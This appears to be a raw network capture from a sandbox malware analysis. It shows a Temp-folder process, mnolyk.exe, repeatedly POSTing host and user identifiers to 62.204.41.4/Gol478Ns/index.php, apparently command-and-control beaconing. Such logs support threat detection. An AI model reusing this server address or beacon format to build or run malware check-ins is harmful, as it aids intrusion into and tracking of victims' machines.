                                                                    Feb 8, 2023 21:33:48.866019011 CET721INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    522192.168.2.35022562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:49.051203012 CET721OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:49.116024971 CET722INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    523192.168.2.35022662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:49.297652006 CET722OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:49.361480951 CET723INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    524192.168.2.35022762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:49.587647915 CET723OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:49.650621891 CET724INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    525192.168.2.35022862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:49.973795891 CET724OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:50.039262056 CET725INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    526192.168.2.35022962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:50.275674105 CET725OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:50.339781046 CET726INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    527192.168.2.35023062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:51.181015968 CET726OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:51.248961926 CET727INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    528192.168.2.35023162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:51.521867037 CET727OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:51.585773945 CET728INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    529192.168.2.35023262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:53.216896057 CET728OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:53.281989098 CET729INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    53192.168.2.34975562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:29.861684084 CET254OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:29.925134897 CET254INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    530192.168.2.35023362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:53.481596947 CET729OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:53.546242952 CET730INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    531192.168.2.35023462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:53.720356941 CET730OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:53.786386013 CET731INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    532192.168.2.35023562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:53.957839966 CET731OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.021266937 CET732INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    533192.168.2.35023662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:54.215832949 CET732OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.281761885 CET733INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    534192.168.2.35023762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:54.456114054 CET733OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.520998955 CET734INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    535192.168.2.35023862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:54.690315008 CET734OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.753885984 CET735INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    536192.168.2.35023962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:54.923460960 CET735OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:54.986309052 CET736INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    537192.168.2.35024062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:55.156611919 CET736OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:55.221343040 CET737INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    538192.168.2.35024162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:55.394284010 CET737OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:55.458506107 CET738INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    539192.168.2.35024262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:55.637495041 CET738OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:55.700236082 CET739INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    54192.168.2.34975662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:30.104619026 CET255OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
